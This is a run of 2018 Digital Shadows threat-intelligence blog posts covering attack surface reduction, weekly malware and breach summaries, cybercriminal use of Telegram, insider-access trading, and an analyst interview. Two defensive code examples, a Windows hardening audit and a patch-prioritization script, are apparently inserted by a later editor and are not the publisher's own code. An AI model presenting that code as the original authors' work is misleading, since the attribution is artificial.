The “RIG” exploit kit has been observed using a rare injection technique called PROPagate, which abuses a Windows operating system function, to deliver a variant of Monero cryptocurrency mining malware. Because PROPagate is considered a form of evasion technique, rather than a security flaw, it will probably continue to be used for malware delivery, as it is unlikely to be patched. Exploit kits are widely used to distribute variants of cryptocurrency mining malware, and this trend will likely continue for the medium- to long-term future (three months to a year or more).


Reducing Your Attack Surface: From a Firehose to a Straw Thu, 05 Jul 2018 16:28:33 +0000 What is Attack Surface Reduction?

Attack Surface Reduction is a powerful tool used to protect and harden environments. It’s a broad term that means many things to different people. In this case, we use the OWASP definition: “attack surface describes all of the different points where an attacker could get into a system, and where they could get data out”. Using this definition, it becomes clear that the reduction of this surface is imperative. Removal of unnecessary features is a big part of this process. Why? Because features mean code, which means bugs, which means vulnerabilities, which means exploits. Exploitation of vulnerable code is not the only issue; if a feature has credentials associated with it, then good credential hygiene must be applied, otherwise the risk of default, weak or stolen credentials becomes a major problem. It is also a regular occurrence that features end up being misconfigured, which can also result in security issues.

When discussing modern IT environments, we typically focus on networked services such as web sites, operating systems and associated applications. However, in the modern era, we also have to deal with cloud and mobile environments. In this blog, we’ll look at how each of these conspires to increase our overall attack surface, while also outlining specific tools and measures that can be used to implement an attack surface reduction program.


One of the biggest challenges with reducing the attack surface of cloud deployments is discovering that there is a cloud deployment at all! Often asset inventory systems are not fit for purpose, particularly when it comes to modern cloud features like AWS Lambdas or Azure functions. Development teams need to work with security teams when it comes to spinning up new cloud infrastructure. If API keys are being generated, then they need to be locked down to the minimal set of permissions required to get the job done.


Corporate mobile phones need to be enrolled into a Mobile Device Management (MDM) system so that they can be centrally managed for patching, visibility and application of policies. Employee personal devices can be placed into an internet-only Wi-Fi network separated from the corporate IT network. This allows employees to still access personal resources while not compromising the security of the corporate IT network.


The first step for reducing the network attack surface is to disable all services that are unnecessary. However, in order to do even this first step, it is necessary to know which IP addresses you own, which services are necessary for the business, which are available on these IP addresses, and so on. Many networks we see are locked down to only allow ports 80 and 443 through. Nonetheless, it’s worth keeping in mind that admin panels for Content Management Systems (CMS) are often available over these standard HTTP(S) ports and, similarly, configuration panels for network equipment like firewalls, VPNs, load balancers, etc. can be inadvertently exposed in this way too.

In situations where there is a limited number of IP addresses connecting to a particular service like a business-to-business (B2B) service or a Remote Desktop Protocol (RDP) service, then IP whitelisting can be an effective approach to reducing the attack surface. Obviously, this approach does not scale to consumer-to-business (C2B) services such as retail operations, which require open access.

It is worth considering here that although your network may be sufficiently hardened, connections into your environment from third party suppliers or partners can be a concern. The ACSC 2017 Threat Report states that: “As it has become more difficult for adversaries to directly compromise their targets, adversaries have sought secondary or tertiary access into primary targets”. It is, therefore, worth keeping in mind that an organization may be a target for the sole reason of their connectivity into other environments.


For hosts, such as those running the Windows operating system, there are many built-in tools that can be used to reduce the attack surface. The “hardentools” application from Security Without Borders disables many of the risky features that are part of Microsoft Windows and Office.

Figure 1: HardenTools application used to disable risky Microsoft Windows features (Source: Security Without Borders)

The tool can be used standalone or simply as inspiration for internal Group Policy Object (GPO) or other policies that can be deployed. Some of the key features it disables are:

  • Windows Script Host (JavaScript & VBScript), which is often used by attackers to gain code execution in an environment.
  • Macros, OLE, ActiveX and DDE for Microsoft Office, as active content is often abused by attackers.
  • Autorun/autoplay for removable media like USB sticks. Although disabling removable media entirely is preferable, there are often cases where it is the only solution for moving files between machines.
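Whether a GPO or a hardentools run actually landed on a host is worth verifying. The following PowerShell audit is an added example, not hardentools’ or Digital Shadows’ code: it reads the standard Windows and Office policy values for the three features listed above and reports which are still enabled; it assumes Office 16.0 (Office 2016/365) for the macro check and only reads the registry.

```powershell
# Added example (not hardentools code): audit three hardentools-style settings
# against their hardened values. Read-only; does not change any setting.
# Assumes Office 16.0 for the Word macro policy key.

function Get-RegistryDword {
    param([string]$Path, [string]$Name)
    try {
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop
        return [int]$item.$Name
    } catch {
        return $null   # key or value absent: the setting is not enforced
    }
}

$checks = @(
    @{
        Feature  = 'Windows Script Host (JScript/VBScript)'
        Path     = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'
        Name     = 'Enabled'
        Hardened = 0      # 0 disables wscript.exe/cscript.exe machine-wide
    },
    @{
        Feature  = 'Word VBA macros'
        Path     = 'HKCU:\Software\Microsoft\Office\16.0\Word\Security'
        Name     = 'VBAWarnings'
        Hardened = 4      # 4 = disable all macros without notification
    },
    @{
        Feature  = 'AutoRun/AutoPlay for removable media'
        Path     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
        Name     = 'NoDriveTypeAutoRun'
        Hardened = 255    # 0xFF disables AutoRun on every drive type
    }
)

$results = foreach ($c in $checks) {
    $actual = Get-RegistryDword -Path $c.Path -Name $c.Name
    [pscustomobject]@{
        Feature  = $c.Feature
        Expected = $c.Hardened
        Actual   = if ($null -eq $actual) { 'not set' } else { $actual }
        Hardened = ($actual -eq $c.Hardened)
    }
}

$results | Format-Table -AutoSize

# Non-zero exit when any feature is still enabled, so the script can gate a
# build image or feed a compliance dashboard.
if ($results.Hardened -contains $false) { exit 1 }
```

Run it under the user whose Office policy you want to check, since the macro setting lives under HKCU while the other two are machine-wide.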

As well as the operating system and office applications, browsers are another key attack surface. Exploit kits and other drive-by download techniques are frequently used by both opportunistic and more targeted, sophisticated groups. Browser attack surface can be reduced by the following measures:

  • Disable unnecessary browser plugins such as Adobe Flash, ActiveX controls, Oracle Java applets and Microsoft Silverlight. Most multimedia is delivered by HTML5 rather than by these other formats.
  • If there is a business requirement for a particular technology or site, then whitelisting the site or technology where appropriate reduces the number of options that an attacker has.
  • If even this is not possible, then use click-to-play, which Google Chrome – for example – supports, so that the content cannot run, and an attacker cannot gain code execution, without explicit user interaction.


By keeping in mind that unnecessary features provide more options for attackers to enter an environment, an attack surface reduction program helps to increase attacker costs by denying them the straightforward methods for achieving access. Our infrastructure incidents product feature informs Digital Shadows customers of services listening on potentially risky external ports.

To find out more about protecting and hardening your environments, listen to our recent ShadowTalk podcast: Episode 29: Reducing Your Attack Surface: From a Firehose to a Straw.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.


ShadowTalk Update – 07.02.2018 Mon, 02 Jul 2018 15:43:25 +0000 In this week’s ShadowTalk, following news that a database containing 340 million records has been publicly exposed to the internet, Richard Gold and Simon Hall join Michael Marriott to discuss how (and why) you can reduce your attack surface.


Necurs botnet updates delivery payloads and evasion techniques

The Necurs botnet has received multiple updates to the delivery mechanism for the payloads distributed by its spam campaigns, as well as to the evasion techniques designed to circumvent mitigation solutions. According to analysis by TrendMicro, the botnet delivered the FlawedAMMYY backdoor trojan by exploiting Microsoft’s Dynamic Data Exchange (DDE) protocol. Security researchers at Cyber Security Strategists detected Necurs delivering the Ursnif banking trojan to companies in Italy, in a first for Ursnif. Ongoing Necurs activity and additional evolution of its tactics and techniques are expected in the short- to medium-term future.

SamSam ransomware introduces new feature to hinder analysis attempts

A new version of the SamSam ransomware has been observed in which the ransomware’s distributors must now manually enter a password on the command line to execute the payload. This feature is unique to SamSam, and appears to have been introduced to prevent security researchers from analyzing the payload’s binary code. Thus far, several lucrative attacks have been attributed to SamSam, with future attacks considered highly likely. SamSam has been active since at least December 2015 and was recently responsible for significantly disrupting operations at Colorado’s Department of Transportation and services for the government of the City of Atlanta.

United States immigration policy attracts muted hacktivist response

The United States presidential administration’s recent “zero tolerance” immigration policy has attracted a limited hacktivist response, including claims of data leaks and denial of service attacks. However, no evidence supports assertions that targeted websites had been taken offline, and alleged leaked data appeared to be publicly available rather than sourced from a data breach incident.

Lazarus group likely responsible for Bithumb cryptocurrency exchange theft

Recent distribution of the Manuscrypt trojan via malicious Hangul Word Processor (HWP) lure documents has been attributed to the Lazarus group. Several similarities between the malware used during the June 2018 cryptocurrency theft from the South Korean exchange Bithumb and in this latest campaign, combined with references to the Bithumb theft in one Hangul lure document, may indicate the group’s involvement in the Bithumb attack. Lazarus has previously been accused of attacks against cryptocurrency exchanges, so the targeted sector and the tactics used are consistent with their modus operandi. Although attribution has not been confirmed at time of writing, the evidence from this latest malware campaign adds credibility to the assessment that Lazarus group was likely responsible for the cryptocurrency theft.

Diversity and Digital Shadows Women’s Network Tue, 26 Jun 2018 15:08:51 +0000 If you haven’t already watched RBG – a movie about the incredible life of U.S. Supreme Court Justice Ruth Bader Ginsburg – you should. Amongst the brilliant quotes Ginsburg brings us, one sticks out: “I ask no favor for my sex, all I ask of our brethren is that they take their feet off our necks”. Gender inequality remains shockingly prevalent, and cybersecurity is far from an exception.

Last week, after months of planning, the Digital Shadows Women’s Network held its first event. It was a great way to share experiences and advice from a range of women in the company, from the developers who built the product six years ago to the latest hires across the globe. The goal? To promote inclusivity and diversity to create equal opportunities within and outside Digital Shadows. With upcoming events in London, Dallas and San Francisco, I’m excited for the impact this can have.

In a recent podcast, I chatted with colleagues about our experiences in security, as well as the challenges, opportunities and future of women in security. Here are the three areas that stuck out most for me:


1.    Progress is not quick enough

One of the top ongoing studies in this field is the Women in Cybersecurity report, published every two years. The latest 2017 report found that the global cybersecurity workforce is 11 percent female, up from 10 percent in 2015. That is neither a quick enough nor a substantial enough change. Even the more progressive companies, such as Google, are less than a third female. This must change at a quicker rate for all levels within organizations, from interns to the board.

2.    Diversity of thought has business benefits

With a smaller pool of talent to choose from, businesses feel the strain of this inequality too. With more and more demand for an increasingly limited talent pool, having a culture that doesn’t encourage diversity puts off a sizable chunk of potential recruits.

But there’s more to it than the size of the talent pool. With different perspectives, we’re better able to address challenges differently and avoid groupthink (this is a topic I’ll be addressing in future blogs, so watch out for those!).


3.    Using gender as springboard for wider diversity

It’s important that this isn’t just about women; gender equality applies equally to males. In fact, it was encouraging to see so many males offering support for the Women’s Network.

We should also think of this as a springboard for wider diversity. “Women” in security is not a homogeneous block; women of different ethnicities will typically experience different forms of discrimination than their white counterparts. For all involved, we need to be providing equal opportunities, as well as a good work-life balance that allows for flexibility amid varying commitments.



To hear more of our thoughts, listen to our podcast on the Women’s Network Launch, and stay tuned for my next blog on the importance of diversity as a whole.


ShadowTalk Update – 06.25.2018 Mon, 25 Jun 2018 14:38:13 +0000 In this week’s ShadowTalk, Simon Hall and Richard Gold join Michael Marriott to discuss the merits and perils of attribution, including the number of characteristics and variables required for a strong attribution, instances where attribution has succeeded, and whether organizations should care.


In the spotlight: TG-3390 deemed responsible for watering hole attacks

A national data center in Mongolia was reportedly compromised by the Chinese state-linked threat group TG-3390 (aka Emissary Panda, APT-27, Lucky Mouse) to conduct watering hole attacks. Legitimate websites were compromised to infect their visitors’ machines with the “HyperBro” trojan. The group used an anti-detection launcher and decompressor for obfuscation, developed by penetration testing software company Metasploit.


Olympic Destroyer threat group switches target sectors

The Olympic Destroyer threat group, attributed with attacks in February 2018 on entities associated with the 2018 Winter Olympic Games, has changed its focus. Recent information-gathering attacks were observed against financial institutions in Russia and biological and chemical threat-prevention laboratories in Europe. Reporting did not specify which companies have been targeted to date. The true intentions and motives of the threat group are unknown; information gathering is often conducted as an early stage, so additional attacks attributed to Olympic Destroyer will likely be observed in the short-term future (next three months).


Financial services provider extorted following data breach

South Africa-based financial services provider Liberty Life was subjected to a data breach and extortion attempt by an unidentified threat actor. The company confirmed an individual had requested payment after alerting them to vulnerabilities affecting their systems. Liberty Life subsequently detected unauthorized access to its IT infrastructure, and the theft of sensitive information. This incident highlights a trend of financially motivated threat actors seeking reward for identifying flaws, then exploiting the flaws when payment is not forthcoming. Liberty Life has publicly stated it has no intention of meeting the payment demands.


PoC code released for Adobe Acrobat vulnerability

PoC code for a remote code execution vulnerability affecting Adobe Acrobat, CVE-2018-4990, was published to GitHub on 18 Jun 2018. The flaw was first reported as having been exploited in the wild in March 2018, alongside a Microsoft Windows privilege escalation vulnerability (CVE-2018-8120). If exploited together, the vulnerabilities allow an attacker to gain an initial foothold and bypass sandbox protection mechanisms. The publication of the PoC code is highly likely to encourage its adoption by threat actors with varying motives for other attacks in the immediate future (next few days or weeks).

How Cybercriminals are Using Messaging Platforms Thu, 21 Jun 2018 15:49:15 +0000 Alternative Ways Criminals Transact Online: A Moving Target

Last week, the cracking forum (specialized in tools for gaining unauthorized access to accounts) known as sentry[.]mba announced they were shifting their communication platform from Discord to Internet Relay Chat (IRC), a move caused by a “sudden ban wave” across the Discord platform. But why bother setting up a messaging platform in the first place? As we detailed in our latest report, Seize and Desist, such platforms offer an alternative way of transacting online and a departure from the centralized market model offered by AlphaBay and its predecessors.

In previous blogs, we’ve discussed how the takedowns of AlphaBay and Hansa have led to the adoption of new technologies, such as blockchain DNS, by cybercriminals. This blog focuses on how messaging platforms are another potential route for cybercriminals.


Figure 1: Sentry MBA Twitter account announces move to IRC network


Messaging Platforms Offer Ways to Avoid Detection

Chat networks can be utilized in a number of ways, and are certainly not mutually exclusive from the forum-based approach. Often sellers will advertise their service or product on a particular forum but, rather than communicating with buyers on the forum or through its private messaging service, encourage interested parties to reach out to them directly on alternative chat networks and messaging platforms. With buyers and sellers spread widely across an increasingly decentralized community, the belief is that a law enforcement operation like Operation Bayonet, which was facilitated by having users congregated in a single, central location such as a marketplace, will be more difficult to repeat. There are many messaging platforms to choose from, including Discord, Skype, Jabber, and IRC, but the most popular is Telegram. While these platforms pre-dated the takedowns of AlphaBay and Hansa, actors have increasingly turned to them to transact online.


Popularity of Telegram Continues to Grow

Of all the messaging platforms, it’s Telegram that appears to be experiencing the most growth, with over 5,000 Telegram links shared across criminal forums and dark web sites over the past six months. Of these, 1,667 were invite links to new groups. These covered a range of services, including cashing out, carding, and cryptocurrency fraud. Within these Telegram channels, sellers post advertisements of their products and services as they would normally do on a marketplace or forum.

One such example is the OL1MP marketplace, a Telegram-based marketplace that provides cashing out services. Cashing out is a way to monetize stolen payment card information. Users can easily select the type of good or service, like drugs or vacations, they wish to purchase with their stolen cards. OL1MP ties in this automated effort with a human touch. As with most marketplaces, reviews are important for attracting new customers. In fact, extra discounts are available for those individuals who post pictures and positive comments from their carded vacations.


Figure 2: OL1MP Telegram channel


In the same way as Tor and I2P are not inherently criminal, nor are messaging platforms. Rather, criminals benefit from the added trust provided by the platforms. While this is an ongoing trend that pre-dates Operation Bayonet, it is yet another example of how criminals have shifted away from the concept of a centralized marketplace. Organizations that wish to track criminal activity online should consider messaging platforms alongside the more traditional forums, message boards and dark web marketplaces.

To find out more about how cybercriminals are shifting away from the marketplace model towards alternative channels, download our report Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age.

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Five Threats to Financial Services: Part One, Insiders Tue, 19 Jun 2018 15:09:41 +0000 The sensitive and financial data held by banks and financial institutions, as well as their centrality to national infrastructure, makes them an attractive target for cybercriminals and hacktivists. In this blog series, we’ll be shining a light on some of the latest tactics and techniques involving insiders, banking trojans, phishing campaigns, and payment card fraud. In future posts, we’ll also peer beyond the cybercrime world to understand if hacktivism poses a viable threat to the financial sector. Let’s start with insiders.

Criminal forum discussions

It’s not uncommon for insiders to offer their access and information across dark web and criminal sites. These discussions include users asking about the best places to sell insider information, others asking where it can be found, individuals claiming to sell insider access, and other users attempting to recruit insiders. It’s something that we will alert our customers to (read our insider use case for more information). The site Intel Exchange (Figure 1), for example, has a dedicated section for insider information discussions. Similarly, Figure 2 illustrates an individual selling insider access to a large mortgage company.


Figure 1: Insider information discussion board on Intel Exchange site


Figure 2: Posts made by user offering insider access to mortgage company


Keyword searches across our dark web spider coverage over only the past six months returned 8,425 mentions of insider trading keywords and phrases on our tracked sites. This data and supplementary manual searches indicate there is substantial interest in insider trading within the online criminal ecosystem.

For example, back in February 2017, a user named “asad1199” made multiple posts to the AlphaBay forum (when the site was still operational) claiming to have access to a Society for Worldwide Interbank Financial Telecommunications (SWIFT) payment gateway and sought experienced users to help them monetize it.


Figure 3: Post made to AlphaBay forum by user asad1199 offering SWIFT access


The user claimed to possess “data” that provided full administrator access to this system. The posts claimed that asad1199 would provide information as to where SWIFT transfers should be sent and offered to provide any potential partners with 10-20% of any profits in exchange for their services.

This user had previously added similar posts to the “Wanted” section of AlphaBay claiming to have access to an Automated Clearing House (ACH) system at a logistics company and an automobile dealership in the United States. In these posts the user offered a bank drop service wherein they would receive payments and then transfer the funds to another account specified by the customer, charging 50% commission.

Specialized insider marketplaces on the dark web

Despite these examples, the most valuable insider information is not typically advertised openly online. Insider access is often a very case-by-case and demand-driven process that is not well suited to online marketplace or forum models.

Those with privileged access or information will most likely conduct their business in person to avoid raising the suspicions of law enforcement. Large datasets containing personally identifiable information or credit card details, on the other hand, are more easily monetizable and likely to be shared and sold across online forums and marketplaces.

Exclusivity and a degree of closed or limited access are significant in the trade of insider access on cybercriminal locations. Insider information only remains valuable while access to it is limited to a small, restricted and trusted group, which is why specialist dark web sites such as The Stock Insider (Figure 4) and KickAss (Figure 5) have ostensibly developed access restrictions to maintain the appearance of legitimacy. Moreover, these restrictions also provide inside sources and buyers with a level of perceived protection, as they will feel their identities are less likely to be exposed or compromised by having too many members in these networks.


Figure 5: Stock Insiders forum homepage



Figure 6: KickAss marketplace homepage advertising insider trading


Of course, we should take these forums with a pinch of salt. The focus on insider trading on KickAss has since been scaled back and the site appears to now cater to a more general criminal community. Threads on other criminal forums and Reddit pages also regularly claim that KickAss is a scam and that users did not receive valid insider trading tips for the membership fee. Membership of the forum requires a monthly fee of 0.25 BTC.

How to Detect Insiders: Don’t Hyper Focus on the Dark Web

Sites like KickAss and The Stock Insider illustrate the interest in insider trading across the dark web and criminal forums. However, you shouldn’t hyper-focus on these sources alone. Organizations should start on the inside: implement the principles of zero trust, know where your toxic data resides, and understand how an insider would monetize that data. Once you have understood this, you can:

  1. Monitor the open, deep, and dark web for mentions of your brand and toxic information.
  2. Work with legal teams to determine the appetite for purchasing items and services sold by potential insiders on criminal forums and marketplaces.
  3. Purchase or use a third party to acquire items and services sold by potential insiders.
  4. Conduct investigations on recruiters and the sellers of goods and services: for example, the history and reputation of the individual, OSINT research, and gathering metadata where possible to aid the investigation.
  5. Don’t forget about the accidental insider; the chances are that you are more likely to have someone send toxic data in a spreadsheet to a third party than to have a malicious insider selling the keys to your kingdom.

Stay tuned for our future blogs on other threats to financial services.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

ShadowTalk Update – 06.18.2018 Mon, 18 Jun 2018 15:34:31 +0000 In ShadowTalk this week, Dr Richard Gold and Simon Hall join Rafael Amado to discuss misconceptions around vulnerabilities and exploits, other techniques for gaining code execution, and how organizations can prioritize the patching of vulnerabilities.



Banco de Chile attackers used wiper malware to obfuscate theft

Fresh analysis of the cyber attack Banco de Chile reported on 24 May 2018 has shed light on the initial tactic: disrupting online, in-branch and telephone banking services to obscure the theft of approximately USD 10 million. The attackers apparently used destructive malware potentially connected to the “Buhtrap” group, a cyber threat group active between 2015 and 2016 that targeted financial institutions to conduct financial fraud. However, the Banco de Chile attack cannot be definitively attributed, as the Buhtrap malware source code was publicly released in February 2016 and has been available to other actors since. Multi-stage attacks that use disruptive and destructive malware to obscure or distract from financial theft will likely continue, as will the exploitation of interbank communication systems for financial gain.


Sensitive data on U.S. Navy projects exposed

Chinese state-affiliated threat actors reportedly stole 614GB of sensitive data relating to the United States Navy in January and February 2018 by compromising an unclassified network used by a contractor. The stolen data included information on active United States military projects, signals and sensor data, cryptographic systems and an electronic warfare library belonging to the Navy’s development unit. No technical details are currently available, nor can the breach be definitively attributed; however, the type of data exfiltrated would be attractive to nation-state actors, including China-linked groups that have previously pursued similar objectives. Contractors’ access to sensitive data will likely continue to present a threat to government and military entities.


Ursnif trojan targets U.S. and Canada

A campaign using tax-related phishing lures to deliver the “Ursnif” banking trojan to bank customers in North America has been identified. Victims were tricked into visiting a URL, supposedly for more information on overdue taxes. Visiting the URL prompted the download of a ZIP file containing Ursnif, which on execution checked for the presence of anti-virus products on the victim’s system. The URL was only accessible from IP addresses in the United States and Canada, and analysis of the sample’s web-inject configuration showed that the malware only targeted customers of North American banks, demonstrating that this was a targeted campaign. Ursnif has been widely used since its source code was leaked in 2010, and has been aimed at the finance, retail, shipping and manufacturing industries. It will likely continue to be used across a variety of campaigns. Similarly, threat actors are likely to continue to use the North American tax seasons as a pretext for simulating legitimate communications.


Dixons Carphone reports customer data breach

On 13 June 2018, the United Kingdom electronics retailer Dixons Carphone reported a data breach affecting 5.9 million payment cards and 1.2 million customer records containing personally identifiable information (PII). Most of the cards had Chip and PIN protection; approximately 100,000 did not, and those may be used for financial fraud or sold on criminal forums. The exposed PII may also be used for a variety of malicious purposes, including social engineering and phishing.



Security Analyst Spotlight Series: Rafael Amado Thu, 14 Jun 2018 16:27:42 +0000 Organizations rely on Digital Shadows to be an extension of their security team. Our global team of analysts provide relevant threat research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we’re able to minimize the real-time false positives that cause nightmares for most organizations.

In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows analyst.


Name: Rafael Amado
Team: Strategy and Research
Title: Senior Strategy and Research Analyst

Q: What sparked your interest in cyber security and intelligence?

A: I took a less-direct route into the industry, coming from a political economy and policy background. As a predoctoral researcher I focused on military and intelligence relationships during the Cold War, particularly between western nations and those undertaking economic liberalization policies. While working in public policy, I realized there’s a widening knowledge and generational gap between current policy makers and the issues facing the modern world. One of these is technology, and in the realm of international relations where my primary interests lie, the realities of cyber security and cyber warfare are, in general, very misunderstood. I therefore decided I could contribute a lot more to the policy debate in future if I had a strong cyber security background from working several years in the industry.


Q: What areas of research do you focus on?

A: My research areas are very varied, and I’ve covered a lot in my time at Digital Shadows, including looking at how disinformation campaigns are carried out and facilitated by the variety of easily-accessible tools and platforms available online. This research came off the back of the U.S. election activity in 2016, and we were keen to demonstrate how disinformation – which is not a new phenomenon by any means – is more than simply a political issue and affects business as well. Threat actors knowingly spread misleading information for reasons other than politics – for example financial gain or prestige.

Other areas I’ve been heavily involved in include the evolution of cybercrime and threats to major sporting events. Given my language capabilities, I worked closely with sponsors and organizers of the 2016 Olympic Games in Rio de Janeiro, Brazil, to develop monitoring plans for a wide range of threats affecting events of this scale. This included hacktivist activity against government organizations and sponsors, as well as financial crime affecting visitors to Brazil. My area studies knowledge and language capabilities were very useful here to make sense of the very distinctive Brazilian criminal ecosystem, which meant cybercriminals developed bespoke malware and phishing techniques to achieve their goals.  


Q: You’ve recently co-authored a paper on cybercrime following the AlphaBay and Hansa takedowns. What are the most significant developments to come out of that research?

A: The main takeaway here is that Operation Bayonet, the joint law enforcement effort to seize AlphaBay and Hansa, has not made consumers and organizations safer when it comes to cybercrime. The takedown efforts have had some noticeable effects, namely further damaging trust between users of marketplaces and criminal forums. However, cybercriminals are resourceful and determined, and they’ve reacted by moving away from the marketplace model altogether. Instead, they favour more specialized forums depending on the services they need; those wanting payment cards visit carding forums and Automated Vending Carts, while those in the market for tools and software tend to go to more technical hacking forums. From here a seller will advertise their services, before asking interested buyers to move onto one of many peer-to-peer channels to discuss business and arrange payment.

Rather than an alternative marketplace taking AlphaBay’s place, we’re seeing encrypted messaging platforms such as Telegram and Discord growing in popularity for this type of activity. I should stress that use of these platforms, as well as others such as Jabber and ICQ, pre-date Operation Bayonet, but it’s definitely where cybercriminals operating at this type of level are flocking at this moment in time.


Q: What have been your highlights working at Digital Shadows?

A: Two things stand out. The first would be the recent research paper we produced looking at file exposure through misconfigured network services such as SMB, FTP, NAS drives and S3 cloud storage, Too Much Information: Misconfigured FTP, SMB, Rsync, and S3 Buckets Exposing 1.5 Billion Files. We received great feedback for this from both our customers and the wider security community. What I loved most here was the joint effort that was required to produce this paper. In all honesty, writing it was the easy part. The major difficulty was building the scanning tool in the first place, and we have an incredible team of security engineers and data scientists who built this mammoth tool able to identify over 1.5 billion exposed files in just under three months. I can’t take any credit for that. The research ignited some much-needed conversation about risks emanating from your supply chain and third parties. The vast majority of the examples of exposed files we detected were a result of contractors backing up sensitive documents – such as penetration tests and security audits – on misconfigured NAS drives, but this is often overlooked when people discuss ways to secure their businesses.

The second highpoint would be my work on the WannaCry ransomware attack from 2017. While the days of the attack were stressful and hectic, when things had settled somewhat I was able to put some of my intelligence tradecraft training to use. I composed what we call an Analysis of Competing Hypotheses table that looked at the goals and objectives of the attackers behind the attack. This structured analytic technique is a great way to identify all the available data points for a given problem and then assess their relevance and the reliability of your sources. The table and accompanying blogs were a big success, being featured by SANS and reposted across various industry publications. When colleagues have had briefings with international law enforcement and security organizations around the world, the latter have commented on the strength and nuance of our analysis in that piece. Having that sort of support and recognition from industry peers is both rewarding and motivating.


Q: How do you see Digital Shadows’ research providing value to customers?

A: From a research and public intelligence perspective, being able to understand and translate the goals, motives and modus operandi of threat actors can be very useful to organizations trying to mitigate risks within their business. If you can recognize what an attacker’s objectives are, you are then better placed to identify which of your systems are most at risk. Knowing how threat actors – be it organized cybercriminal groups, nation states or individual hackers – operate means you can systematically develop a model of their behaviour, much like a playbook of their tactics, techniques and procedures. From here you can then identify what critical assets you need to secure, and draw up a defensive security controls checklist that you can apply directly to your environment so these weak points don’t exist. We refer to this as threat modelling.

The other benefit of this type of approach is that organizations often struggle to picture themselves from an attacker’s perspective. A business may be compromised for its own assets – to steal its sensitive data or disrupt its critical systems – but it may also become a secondary victim if its assets can help an attacker reach their primary target. For example, a smaller organization may assume that it is of no interest to a large cybercriminal outfit or sophisticated attacker, but in reality, these attackers may look to the organization’s infrastructure as a staging post or pivot point to achieve their loftier objectives.


Q: What are some of the challenges working in the security research space?

A: Cutting through a lot of the noise in this space and providing insight that is relevant and operationally empathetic isn’t easy, but this is one of the guiding missions for the work that we do at Digital Shadows. In my area specifically, there are a lot of exaggerations and idealized concepts when it comes to what makes “useful intelligence”. Take Common Vulnerabilities and Exposures (CVEs) and patching as an example. Lots of CVEs are being created and reported, but the difficulty for organizations lies in how to prioritize what you patch. There’s an emerging common wisdom that discussions of CVEs on underground forums and chat channels are a good indicator of what vulnerabilities are the most significant and in need of attention. The reality though is that most of these conversations are by individuals who lack the capability to ever exploit a vulnerability, and they are merely sharing news articles between them the same way we do as colleagues in the office. Activity on the dark web and criminal underground generates headlines and looks impressive, but it shouldn’t be the only place researchers look to for their data.

Instead, organizations and their security teams are much better off prioritizing patches of vulnerabilities that are actually being exploited in the wild, not just discussed online. In particular, the focus should be on vulnerabilities that allow for remote code execution and local privilege escalation against ubiquitous applications such as Office, web browsers, content management systems and operating system kernels. Simplifying and narrowing the focus for security teams means they can divert their resources to the right problems. This should be the aim for anyone serious about producing quality security research, but of course, that’s easier said than done.
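As an added illustration of the prioritization rule described in this answer (example code written for this page, not part of the interview and not Digital Shadows tooling), the block below scores a constructed inventory of vulnerabilities on in-the-wild exploitation, public exploit availability, impact class and product ubiquity, and compares that ordering with a naive ranking by forum chatter. Identifiers, field names and weights are placeholders chosen for the example.

```python
"""Added example: rank vulnerabilities by evidence of real-world exploitation
and impact on ubiquitous software, not by the volume of underground chatter.
Illustrative code, not Digital Shadows tooling; every record, field name and
weight below is constructed for the example."""
from dataclasses import dataclass
from typing import Iterable, List

# Product families singled out in the text as worth prioritising.
UBIQUITOUS = {"office", "browser", "cms", "kernel"}

# Constructed weights: in-the-wild exploitation dominates, then a public
# exploit, then impact class, then how widely deployed the product is.
IMPACT_WEIGHT = {"rce": 20, "lpe": 15, "dos": 5, "info": 3}


@dataclass(frozen=True)
class Vuln:
    ident: str             # placeholder identifier, not a real CVE
    product: str           # product family, e.g. "browser"
    impact: str            # "rce", "lpe", "dos" or "info"
    exploited_in_wild: bool
    public_exploit: bool   # PoC or weaponised exploit publicly available
    forum_mentions: int    # underground discussion volume (treated as noise)


def score(v: Vuln) -> int:
    """Urgency score; higher means patch sooner. Chatter is deliberately ignored."""
    s = 0
    if v.exploited_in_wild:
        s += 50
    if v.public_exploit:
        s += 20
    s += IMPACT_WEIGHT.get(v.impact, 0)
    if v.product in UBIQUITOUS:
        s += 10
    return s


def prioritise(vulns: Iterable[Vuln]) -> List[Vuln]:
    """Most urgent first; ties broken by identifier for a stable order."""
    return sorted(vulns, key=lambda v: (-score(v), v.ident))


def rank_by_chatter(vulns: Iterable[Vuln]) -> List[Vuln]:
    """The approach the text argues against: loudest on the forums first."""
    return sorted(vulns, key=lambda v: (-v.forum_mentions, v.ident))


# Constructed sample inventory (identifiers are placeholders).
SAMPLE = [
    Vuln("VULN-1", "browser", "rce", exploited_in_wild=True, public_exploit=True, forum_mentions=3),
    Vuln("VULN-2", "cms", "rce", exploited_in_wild=False, public_exploit=True, forum_mentions=900),
    Vuln("VULN-3", "kernel", "lpe", exploited_in_wild=True, public_exploit=False, forum_mentions=0),
    Vuln("VULN-4", "niche-app", "dos", exploited_in_wild=False, public_exploit=False, forum_mentions=2000),
]

if __name__ == "__main__":
    for v in prioritise(SAMPLE):
        print(f"{v.ident:8} score={score(v):3}  mentions={v.forum_mentions}")
    print("by chatter:", [v.ident for v in rank_by_chatter(SAMPLE)])
```

Run stand-alone, the evidence-based ordering puts the actively exploited browser RCE and kernel LPE ahead of the much-discussed but unexploited entries, while the chatter ranking would have the team patch the denial-of-service bug in a niche application first.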


Interested in hearing more from our intelligence team? Check out our blog, our Security Analyst Spotlight Series, or subscribe to our weekly threat intelligence podcast: ShadowTalk.



